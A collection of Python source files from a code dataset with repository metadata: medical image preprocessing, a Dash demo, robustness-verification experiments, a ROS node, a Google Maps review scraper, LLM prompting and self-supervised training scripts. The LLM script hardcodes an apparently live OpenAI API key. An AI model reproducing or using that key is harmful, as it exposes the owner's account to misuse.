shrink, bspline, iters, thresh, out_img] = parse_inputs(parser, args)\n\n if out_img is not None and os.path.exists(out_img):\n print(\"\\n %s already exists\" % out_img)\n\n else:\n\n start_time = datetime.now()\n\n n4 = N4BiasFieldCorrection()\n n4.inputs.dimension = 3\n n4.inputs.input_image = in_img\n n4.inputs.bspline_fitting_distance = bspline\n n4.inputs.shrink_factor = shrink\n n4.inputs.n_iterations = iters\n n4.inputs.convergence_threshold = thresh\n\n cpu_load = 0.9\n cpus = multiprocessing.cpu_count()\n ncpus = int(cpu_load * cpus)\n\n n4.inputs.num_threads = ncpus\n\n if mask_img is not None:\n n4.inputs.args = \"--mask-image %s\" % mask_img.strip()\n\n if out_img is not None:\n n4.inputs.output_image = out_img.strip()\n\n print(\"\\n bias field correcting %s \" % in_img)\n n4.terminal_output = \"none\"\n n4.run()\n\n endstatement.main('Bias field correction', '%s' % (datetime.now() - start_time))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","repo_name":"AICONSlab/HippMapp3r","sub_path":"hippmapper/preprocess/biascorr.py","file_name":"biascorr.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"24591052432","text":"import dash\r\nimport plotly.express as px\r\nimport pandas as pd\r\nfrom dash import html, dcc\r\nfrom dash.dependencies import Input, Output, State\r\n# Apresentando callback pela primeira vez\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\n\r\napp.layout = html.Div([\r\n html.H6(\"Altere o valor abaixo para ver o callback em ação!\"),\r\n html.Div([\"Entrada:\",\r\n dcc.Input(id='my-input', value='Valor inicial', type='text')]),\r\n html.Br(),\r\n html.Div(id='my-output'),\r\n])\r\n\r\n@app.callback(\r\n Output(component_id='my-output', component_property='children'),\r\n [Input(component_id='my-input', component_property='value')]\r\n #estado state\r\n #ideia -> sempre que a propriedade value do componente my-input for alterada executa a função update_output_div e retorna o retorno da função para o componente my-output\r\n)\r\ndef update_output_div(input_value):\r\n return 'Saída: {}'.format(input_value)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","repo_name":"AnaMarcacini/Asimov_Academy","sub_path":"Dashboards/Dash/Básico/callback_app1.py","file_name":"callback_app1.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21747531272","text":"# -*- coding: utf-8 -*-\n# created by makise, 2022/7/26\nimport concurrent.futures\nimport time\n\nimport pebble\n\n\n# experiment 2\ndef determine_robustness(size, labels, models, task):\n colors = [0, 0.2, 0.4, 0.6, 0.8, 1]\n robusts = []\n color_times = []\n for c in range(5):\n color_start_time = time.monotonic()\n position_range = (1, 28 - size + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n robust = True\n for label in labels:\n start_time = time.monotonic()\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n color = (colors[c], colors[c + 1])\n for i in range(4):\n a = position[i]\n b = position[i]\n size_a = (size, size)\n size_b = (size, size)\n future = pool.schedule(task, (models[i], label, a, b, size_a, size_b, color), timeout=60)\n try:\n print('label {}, a&b {}, size_a&b {}, color {}'.format(label, a, size_a, color), flush=True)\n task_start_time = time.monotonic()\n result = future.result()\n print(\"task end in \", time.monotonic() - task_start_time)\n except concurrent.futures.TimeoutError:\n print(\"timeout\", flush=True)\n result = 'unsat' # To keep format with return value of task\n if result == 'sat':\n robust = False\n break\n print(\"label {} end in {}\".format(label, time.monotonic() - start_time))\n robusts.append(robust)\n color_times.append(time.monotonic() - color_start_time)\n return robusts, color_times\n\n\n# experiment 1\ndef find_robust_lower_bound(l, u, labels, model, task):\n lower = l\n _, image_height, image_width = (1, 28, 28)\n upper = u\n upper_last_sat = upper\n iter_count = 0\n while upper - lower >= 1:\n iter_count += 1\n position_range = (1, image_height - lower + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [1, step, 2 * step, 3 * step, position_range[1]]\n robust = True\n for label in labels:\n start_time = time.monotonic()\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n for i in range(4):\n a = (position[i], position[i + 1])\n b = (position[i], position[i + 1])\n size_a = (lower, upper)\n size_b = (lower, upper)\n future = pool.schedule(task, (model, label, a, b, size_a, size_b, (0, 0)))\n try:\n print('iteration {}: label {}, a&b {}, size_a&b {}'.format(iter_count, label, a, size_a),\n flush=True)\n task_start_time = time.monotonic()\n result = future.result(timeout=60)\n print(\"task end in \", time.monotonic() - task_start_time)\n except concurrent.futures.TimeoutError:\n future.cancel()\n print(\"iteration {} timeout\".format(iter_count), flush=True)\n result = 'unsat' # To keep format with return value of task\n if result == 'sat':\n robust = False\n break\n print(\"label {} end in {}\".format(label, time.monotonic() - start_time))\n if not robust:\n print(\"size {} is not robust\".format((lower, upper)), flush=True)\n upper_last_sat = upper\n upper = (upper + lower) // 2\n else:\n print(\"size {} is robust\".format((lower, upper)), flush=True)\n lower = upper\n upper = (upper_last_sat + lower) // 2\n return upper\n\n\ndef determine_robustness_color_fixed(sizes, labels, model, color, task):\n robusts = []\n size_times = []\n adversarial_examples = []\n timeout_count = 0\n total_num = 0\n for size in range(sizes[0], sizes[1] + 1):\n adversarial_example = {}\n print(\"size {}x{} starts:\".format(size, size))\n size_start_time = time.monotonic()\n position_range = (1, 28 - size + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n robust = True\n for label in labels:\n print(\"label {} starts:\".format(label))\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n for i in range(4):\n total_num += 1\n a = position[i]\n b = position[i]\n size_a = (size, size)\n size_b = (size, size)\n future = pool.schedule(task, (model, label, a, b, size_a, size_b, (color, color)))\n try:\n result, result_input = future.result(timeout=60)\n except concurrent.futures.TimeoutError:\n future.cancel()\n print(\"timeout\", flush=True)\n timeout_count += 1\n result = 'unsat' # To keep format with return value of task\n if result == 'sat':\n robust = False\n adversarial_example['a'] = result_input[0]\n adversarial_example['size_a'] = result_input[1]\n adversarial_example['b'] = result_input[2]\n adversarial_example['size_b'] = result_input[3]\n adversarial_example['color'] = result_input[4]\n break\n print(\"label {} ends\".format(label))\n robusts.append(robust)\n size_times.append(time.monotonic() - size_start_time)\n adversarial_examples.append(adversarial_example)\n print(\"size {}x{} ends\".format(size, size))\n timeout_prop = timeout_count / total_num\n return robusts, adversarial_examples, size_times, timeout_prop\n\n\ndef determine_robustness_with_epsilon(size, labels, epsilon, model, task, workers, split):\n task_start_time = time.monotonic()\n robust = True\n adversarial_example = {}\n timeout_count = 0\n total_num = 0\n position_range = (1, 28 - size[0] + 1)\n if split == 4:\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n elif split == 5:\n step = (position_range[1] - position_range[0] + 2) // 5\n position = [(step, 2 * step), (2 * step, 3 * step), (3 * step, 4 * step), (1, step),\n (4 * step, position_range[1])]\n # position = [(5, 10), (10, 15), (15, 20), (1, 5), (20, 24)]\n else:\n step = (position_range[1] - position_range[0] + 1) // split\n position = [(max(1, i * step), min((i + 1) * step, position_range[1])) for i in range(split)]\n for label in labels:\n if not robust:\n break\n start_time = time.monotonic()\n params_model = []\n params_label = []\n params_position_a = []\n params_position_b = []\n params_size = []\n params_epsilon = []\n for i in range(split):\n for j in range(split):\n params_model.append(model)\n params_label.append(label)\n params_position_a.append(position[i])\n params_position_b.append(position[j])\n params_size.append(size)\n params_epsilon.append(epsilon)\n\n with pebble.ProcessPool(workers) as pool:\n future = pool.map(task, params_model, params_label, params_position_a, params_position_b, params_size,\n params_size, params_epsilon, timeout=60)\n iterator = future.result()\n while True:\n try:\n total_num += 1\n result, result_input = next(iterator)\n print(\"result is \", result, flush=True)\n if result == 'sat':\n robust = False\n adversarial_example['a'] = result_input[0]\n adversarial_example['size_a'] = result_input[1]\n adversarial_example['b'] = result_input[2]\n adversarial_example['size_b'] = result_input[3]\n adversarial_example['epsilons'] = [result_input[i] for i in range(4, 4 + (28 * 28))]\n print(\"verification exit in idx at label\".format(label), flush=True)\n future.cancel()\n except StopIteration:\n print(\"iterator ends\")\n break\n except concurrent.futures.TimeoutError as error:\n print(\"timeout, \", error.args, flush=True)\n timeout_count += 1\n except concurrent.futures.CancelledError as error:\n print(\"cancelled, \", error.args, flush=True)\n except Exception:\n print(\"error\", flush=True)\n print(\"label {} end in {}\".format(label, time.monotonic() - start_time), flush=True)\n return robust, adversarial_example, timeout_count / total_num, time.monotonic() - task_start_time","repo_name":"MakiseGuo/OccRob","sub_path":"mnist/experiment/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70467841332","text":"carac = input('Digite uma cadeia de caracteres (até 255): ')\nwhile len(carac)>255:\n print('Não pode ser mais de 255 caracteres')\n carac = input('Digite novamente: ')\ncont_e = carac.count(' ')\ncont_p = len(carac.split())\ncont_A = carac.count('a') + carac.count('A')\ncont_v = 0\nfor c in carac.upper():\n if c in 'AÁÀÃÂEÉÈÊIÍÌOÓÒÕÔUÚÙÛ':\n cont_v += 1\nprint(f'A quantidade de espaços em branco é: {cont_e}; a quantidade de palavras é: {cont_p}; a quantidade de letras a é {cont_A} e a quantidade de vogais é {cont_v}')","repo_name":"atico0/python","sub_path":"300_ideias_p_programar/4.3.14.py","file_name":"4.3.14.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4418809680","text":"from collections import defaultdict\n\nclass Graph:\n\n def __init__(self, vertices):\n self.V = vertices\n self.gragh = defaultdict(list)\n\n def DFSUtil(self, v, visited):\n\n visited[v] = True\n\n for i in self.gragh[v]:\n if visited[i] == False:\n self.DFSUtil(i, visited)\n\n def addEdge(self, v, w):\n self.gragh[v].append(w)\n\n def findMother(self):\n\n #visited is for DFS\n visited = [False] * (self.V)\n motherVertex = 0\n\n for i in range(self.V):\n if visited[i] == False:\n self.DFSUtil(i, visited)\n motherVertex = i\n\n #We simply check is every vertex is reachable by v\n visited = [False] * (self.V)\n\n self.DFSUtil(motherVertex, visited)\n\n if any(i == False for i in visited):\n return -1\n\n else:\n return motherVertex\n\ng = Graph(7)\ng.addEdge(0, 1)\ng.addEdge(0, 2)\ng.addEdge(1, 3)\ng.addEdge(4, 1)\ng.addEdge(6, 4)\ng.addEdge(5, 6)\ng.addEdge(5, 2)\ng.addEdge(6, 0)\nprint (\"A mother vertex is \" + str(g.findMother()))\n\n\n\n\n\n\n\n","repo_name":"Taoge123/LeetCode","sub_path":"Graph/MotherVertex.py","file_name":"MotherVertex.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74284961334","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom visualization_msgs.msg import Marker\n\nclass RoboDriver:\n def __init__(self):\n self.mk_msg = Marker()\n self.rate = rospy.Rate(10)\n self.odom_sub = rospy.Subscriber('/pose', PoseStamped, self.odom_callback)\n self.mark_pub = rospy.Publisher('markers', Marker, queue_size = 0)\n\n def odom_callback(self, msg):\n #print msg\n self.mk_msg.header.frame_id = msg.header.frame_id\n self.mk_msg.header.seq = msg.header.seq\n self.mk_msg.pose = msg.pose\n self.mk_msg.color.a = 1\n self.mk_msg.color.r = 1\n self.mk_msg.color.b = 1\n self.mk_msg.scale.x = 0.5;\n self.mk_msg.scale.y = 0.5;\n self.mk_msg.scale.z = 0.5;\n #self.mk_msg.pose.position.z = 0\n\n def main(self):\n while not rospy.is_shutdown():\n self.mark_pub.publish(self.mk_msg)\n self.rate.sleep() \n\nif __name__ == '__main__':\n rospy.init_node(\"get_position\")\n r = RoboDriver()\n r.main()\n","repo_name":"lec9243/cosc169_robotics","sub_path":"hw1_pack/scripts/hw1_task3.py","file_name":"hw1_task3.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3014651200","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport pandas as pd\nimport requests\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\ndef scrape(myurl1):\n\tchrome = webdriver.Chrome()\n\tdriver = chrome\n\tdriver.get(myurl1)\n\n\tdelay = 3# seconds\n\ttry:\n\t\tmyElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.ID, 'content-container')))\n\t\tprint(\"Page is ready!\")\n\texcept TimeoutException:\n\t\tprint(\"Loading took too much time!\")\n\n\n\ttime.sleep(10)\n\n\n\n\n\treviewCount = len(driver.find_elements_by_xpath(\"//div[@class='section-review ripple-container']\"))\n\n\ttotalReviews = driver.find_elements_by_xpath('//*[@id=\"pane\"]/div/div[1]/div/div/div[3]/div[2]/div/div[2]/div[2]');\n\ttotalReviews = [i for i in totalReviews][0].text\n\ttotalReviews = int(totalReviews.split()[0])\n\tprint(str(totalReviews) + \" reviews found\")\n\n\t# loading a minimum of 50 reviews\n\twhile reviewCount < totalReviews: #<=== change this number based on your requirement\n\t\t#print(\"Scrolling to review number :\", reviewCount)\n\t\t# load the reviews\n\t\tdriver.find_element_by_xpath(\"//div[contains(@class,'section-loading-spinner')]\").location_once_scrolled_into_view \n\t\t# wait for loading the reviews\n\t\tWebDriverWait(driver,10).until(EC.presence_of_element_located((By.XPATH,\"//div[@class='section-loading-overlay-spinner'][@style='display:none']\")))\n\t\t# get the reviewsCount\n\t\treviewCount = len(driver.find_elements_by_class_name(\"section-review-content\"))\n\n\n\n\n\n\n\n\n\t# Get all content boxes\n\treviewers = []\n\tstars = []\n\tage = []\n\tcontent = []\n\n\tboxes = driver.find_elements_by_class_name('section-review-content')\n\tfor i in boxes:\n\t\ttemp_rev = i.find_elements_by_class_name('section-review-title')\n\t\tfor j in temp_rev:\n\t\t\treviewers.append(j.text);\n\n\ttemp_str = driver.find_elements_by_class_name('section-review-stars')\n\tstars = [q.get_attribute(\"aria-label\") for q in temp_str]\n\n\ttemp_age = driver.find_elements_by_class_name('section-review-publish-date')\n\tage = [t.text for t in temp_age]\n\n\ttemp_content = driver.find_elements_by_class_name('section-review-review-content')\n\tcontent = [c.text for c in temp_content]\n\n\t\t\n\t#print(reviewers, len(reviewers), '\\n\\n')\n\t#print(stars, len(stars), '\\n\\n')\n\t#print(age, len(age), '\\n\\n')\n\t#print(content, len(content), '\\n\\n')\n\n\treview_df = pd.DataFrame()\n\treview_df['Reviewer'] = reviewers\n\treview_df['Stars'] = stars\n\treview_df['Age'] = age\n\treview_df['Content'] = content\n\n\tprint(review_df)\n\tprint(\"Total Reviews Scraped = \", review_df.shape[0])\n\n\ttime.sleep(4)\n\tdriver.quit()\n\n\treturn review_df\n\n\n#myurl1 = \"https://www.google.com/maps/place/Tembusu+College/@1.3058932,103.7716691,17z/data=!4m7!3m6!1s0x31da1af50a2f1ebf:0x8aea55fe34ee4a51!8m2!3d1.3058932!4d103.7738578!9m1!1b1\"\n\nif __name__ == '__main__':\n\tmyurl1 = \"https://www.google.com/maps/place/Cinnamon+College/@1.3067015,103.7713382,17z/data=!4m7!3m6!1s0x31da1af5169c1e05:0xbf1136a704621ca3!8m2!3d1.3067015!4d103.7735269!9m1!1b1\"\n\tmyurl2 = \"https://www.google.com/maps/place/CMPB/@1.280195,103.815126,17z/data=!4m7!3m6!1s0x31da1bd0af54732f:0x9c274decbab4e599!8m2!3d1.280195!4d103.815126!9m1!1b1\"\n\tmydf = scrape(myurl2);\n\n\tmydf.to_csv('googlereviews.csv')\n\n\n\n\n","repo_name":"VibhuKrovvidi/BT4103CapstoneProject","sub_path":"code/scrapers-ns/googlereviews_scrape.py","file_name":"googlereviews_scrape.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21793877451","text":"from transformers import AutoConfig, LlamaForCausalLM, LlamaTokenizer,AutoModelForSeq2SeqLM, AutoTokenizer,AutoModelForCausalLM,pipeline\nimport openai\nopenai.api_key =\"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\"\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nimport datetime\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"--model\",type=str,default='vicuna-13b')\nparser.add_argument(\"--task\",type=str)\nparser.add_argument(\"--prompt_type\",type=str,choices=['basic_prompt','instructive_prompt','CoT_prompt'])\nargs=parser.parse_args()\n\nprompt_file=pd.read_csv(\"./prompt/\"+args.task+\"_task_prompt.csv\")\n\n\ndef generate(model_name,prompt_list,max_new_tokens=512,do_sample=False,num_beams=1,diversity_penalty=0.0,temperature=1.0,top_k=50,\\\n top_p=1,repetition_penalty=1):\n result_list=[]\n if model_name=='vicuna-13b':\n tokenizer = LlamaTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-13b-v1.5-16k/\")\n model = LlamaForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-13b-v1.5-16k/\",device_map='auto')\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n elif model_name=='vicuna-7b':\n tokenizer = LlamaTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-7b-v1.5-16k/\")\n model = LlamaForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-7b-v1.5-16k/\",device_map='auto')\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n \n elif model_name=='flan-t5-xxl':\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/flan-t5-xxl/\")\n model = AutoModelForSeq2SeqLM.from_pretrained(\"/lustre/S/zhaoyunpu/flan-t5-xxl/\",device_map='auto')\n \n elif model_name==\"flan-UL2\":\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/flan-UL2/\")\n model = AutoModelForSeq2SeqLM.from_pretrained(\"/lustre/S/zhaoyunpu/flan-UL2/\",device_map='auto')\n \n elif model_name=='mpt-30b-chat':\n config = AutoConfig.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\",config=config,device_map='auto',trust_remote_code=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\")\n \n elif model_name=='llama-2-13b':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\",config=config,device_map='auto',trust_remote_code=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n elif model_name=='llama-2-70b':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\",config=config,device_map='auto',trust_remote_code=False)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n elif model_name=='bloomz':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\",config=config,device_map='auto',trust_remote_code=True,load_in_8bit=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n else:\n raise Exception(\"Invalid model name.\")\n\n for prompt in tqdm(prompt_list):\n result = generator(prompt,return_full_text=False)[0]['generated_text']\n result_list.append(result)\n print(result_list[-1])\n return result_list\n \n'''\n for prompt in tqdm(prompt_list):\n inputs=tokenizer(prompt,return_tensors='pt').to('cuda')\n generate_ids=model.generate(**inputs,max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n result_list.append(tokenizer.batch_decode(generate_ids,skip_special_tokens=True,clean_up_tokenization_spaces=False))\n return result_list\n'''\nif args.model=='gpt-3.5':\n prompt_list=prompt_file[args.prompt_type].tolist()\n output=[]\n for prompt in tqdm(prompt_list):\n message=prompt\n user_assistant_msgs = {\"role\": \"user\", \"content\": message}\n response = openai.ChatCompletion.create(model='gpt-3.5-turbo-0613',\n messages=[user_assistant_msgs])\n status_code = response[\"choices\"][0][\"finish_reason\"]\n assert status_code == \"stop\", f\"The status code was {status_code}.\"\n returned_text = response[\"choices\"][0][\"message\"][\"content\"]\n output.append(returned_text)\n print(output[-1])\nelse:\n output=generate(model_name=args.model,prompt_list=prompt_file[args.prompt_type].tolist())\noutput=pd.Series(output)\noutput.to_csv(\"./result/\"+args.model+'_'+args.task+'_'+args.prompt_type+'_'+datetime.datetime.now().strftime(\"%Y%m%d\")+\".csv\",index=False)\n\n\n\n\n\n\n\n","repo_name":"wenyi-li/LLM_Creativity","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21908600485","text":"\"\"\"Trains an encoder network using self-supervised learning. \n\nUsage example: \n> python train_ssl.py --data_path ../data/images.h5 --augmentations jcrg --output_dir ../experiments/test/\n --batch_size 256 --learning_rate 0.03 --max_epochs 1 --max_num_samples 2048 \n\nImportant parameters for training\n\n\nCurrently supports MocoV2.\n\nDDP training encouraged!\n\"\"\"\n\n# To prevent OpenBLAS blas_thread_init\n# os.environ['OPENBLAS_NUM_THREADS'] = '1'\n\nimport numpy as np\nimport torch\nimport torchvision\nimport pytorch_lightning as pl\nimport h5py\n\nimport argparse\nimport logging\n\nfrom pathlib import Path\nimport os\nimport sys\nimport glob\n\nfrom pytorch_lightning import loggers as pl_loggers\n# from pl_bolts.models.self_supervised import Moco_v2\nfrom pytorch_lightning.plugins import DDPPlugin\n\nfrom ssl_legacysurvey.moco.moco2_module import Moco_v2\nfrom ssl_legacysurvey.data_loaders import datamodules\nfrom ssl_legacysurvey.utils import format_logger\n\ndef parse_arguments():\n \"\"\"\n Parse command line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='runtime parameters')\n # Data loading\n parser.add_argument(\"--data_path\", type=str, default='/pscratch/sd/g/gstein/machine_learning/decals_self_supervised/data/images_npix152_000000000_003500000.h5',\n help=\"Path to hdf5 data file\")\n \n parser.add_argument(\"--num_workers\", type=int, default=16,\n help=\"Number of workers for data loader\")\n\n # Training \n parser.add_argument(\"--gpu\", action=\"store_true\",\n help=\"Use GPU\")\n\n parser.add_argument(\"--gpus\", type=int, default=-1,\n help=\"Number of gpus to use\")\n\n parser.add_argument(\"--num_nodes\", type=int, default=1,\n help=\"Number of gpu nodes available\")\n\n # ddp does not work in ipython notebook, only ddp_spawn does\n parser.add_argument(\"--strategy\", type=str, default='ddp', #'ddp_spawn',\n help=\"Distributed training strategy\")\n\n parser.add_argument(\"--fast_dev_run\", action=\"store_true\",\n help=\"Run only a few batches\")\n\n parser.add_argument(\"--check_val_every_n_epoch\", type=int, default=999,\n help=\"How often to run validation epoch\")\n \n parser.add_argument(\"--checkpoint_every_n_epochs\", type=int, default=1,\n help=\"Checkpoint model every n epochs\")\n\n parser.add_argument(\"--save_top_k\", type=int, default=5,\n help=\"Top number of checkpoints to save\")\n\n parser.add_argument(\"--num_sanity_val_steps\", type=int, default=0,\n help=\"Number of validation steps to run right after model initialization\")\n\n parser.add_argument(\"--max_num_samples\", type=int, default=None,\n help=\"Maximum number of data samples to use. Defaults to full dataset size\")\n\n # Augmentations\n parser.add_argument(\"--augmentations\", type=str, default='grrrssgbjcgnrg',\n help=\"2 character abbreviations of training augmentations to use\")\n\n parser.add_argument(\"--val_augmentations\", type=str, default='ccrg',\n help=\"2 character abbreviations of validation augmentations to use\")\n\n parser.add_argument(\"--jitter_lim\", type=int, default=7,\n help=\"Number of pixels in x,y to jitter image. (-jitter_lim, jitter_lim)\")\n\n parser.add_argument(\"--only_dered\", action=\"store_true\",\n help=\"Deredden if calling gr augmentation\")\n\n parser.add_argument(\"--only_red\", action=\"store_true\",\n help=\"Redden if calling gr augmentation\")\n\n parser.add_argument(\"--ebv_max\", type=float, default=1.0,\n help=\"Maximum extinction reddening to use if calling gr augmentation\")\n\n parser.add_argument(\"--gn_uniform\", action=\"store_false\",\n help=\"Draw from uniform Gaussian noise if using gn augmentation\")\n\n parser.add_argument(\"--gb_uniform\", action=\"store_false\",\n help=\"Draw from uniform Gaussian blur if using gb augmentation\")\n\n parser.add_argument(\"--gr_uniform\", action=\"store_false\",\n help=\"Draw from uniform Galactic reddenning if using gr augmentation\")\n\n # Optimizers\n parser.add_argument(\"--batch_size\", type=int, default=256,\n help=\"Batch size for model training\")\n\n parser.add_argument(\"--learning_rate\", type=float, default=0.03,\n help=\"Learning rate for model optimization\")\n\n parser.add_argument(\"--encoder_momentum\", type=float, default=0.996,\n help=\"Mocov2 encoder momentum\")\n\n parser.add_argument(\"--softmax_temperature\", type=float, default=0.2,\n help=\"Mocov2 softmax temperature\")\n\n parser.add_argument(\"--max_epochs\", type=int, default=1,\n help=\"Max number of training epochs\")\n\n parser.add_argument(\"--optimizer\", type=str, default='SGD',\n help=\"Optimizer to use - Mocov2 only accepts SGD\", choices=['SGD'])\n\n parser.add_argument(\"--test_run\", action=\"store_true\",\n help=\"Subsample training and validation data\")\n\n parser.add_argument(\"--seed\", type=int , default=13579,\n help=\"random seed for train test split\")\n\n # Model architecture and settings\n parser.add_argument(\"--backbone\", type=str, default='resnet18',\n help=\"Encoder architecture to use\", choices=['resnet18', 'resnet34', 'resnet50', 'resnet152'])\n \n parser.add_argument(\"--use_mlp\", action=\"store_true\",\n help=\"use projection head\")\n\n parser.add_argument(\"--emb_dim\", type=int, default=128,\n help=\"Dimensionality where loss is calculated\")\n\n parser.add_argument(\"--num_negatives\", type=int, default=65536,\n help=\"Number of negative samples to keep in queue\")\n\n # Setup outputs and others\n parser.add_argument(\"--ckpt_path\", type=str, default=None,\n help=\"Continue training from checkpoint on disk\")\n\n parser.add_argument(\"--output_dir\", type=str, default='../experiments/test/',\n help=\"directory to save trained model and logs\")\n\n parser.add_argument(\"--logfile_name\", type=str, default='ssl_train.log',\n help=\"name of log file\")\n \n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"increase output verbosity\")\n\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n \"\"\"Sets up model, sets training parameters, configures training callbacks, then trains model\"\"\"\n\n params = vars(args) # convert args to dictionary\n params['ssl_training'] = True\n \n pl.seed_everything(params['seed'], workers=True)\n Path(params['output_dir']).mkdir(parents=True, exist_ok=True)\n\n logger = format_logger.create_logger(\n filename=os.path.join(params['output_dir'], params['logfile_name']),\n )\n\n logger.info(\"\\nTraining with the following parameters:\")\n for k, v in params.items():\n logger.info(f\"{k}: {v}\")\n\n file_output_head = f\"bs{params['batch_size']}_lr{params['learning_rate']}_tau{params['softmax_temperature']}\"\n\n if params['ckpt_path']:\n # Load pretrained backbone from checkpoint on disk\n model = Moco_v2.load_from_checkpoint(\n checkpoint_path=params['ckpt_path'],\n )\n else:\n # Train from scratch\n model = Moco_v2(\n base_encoder=params['backbone'],\n emb_dim=params['emb_dim'],\n use_mlp=params['use_mlp'],\n encoder_momentum=params['encoder_momentum'],\n softmax_temperature=params['softmax_temperature'],\n 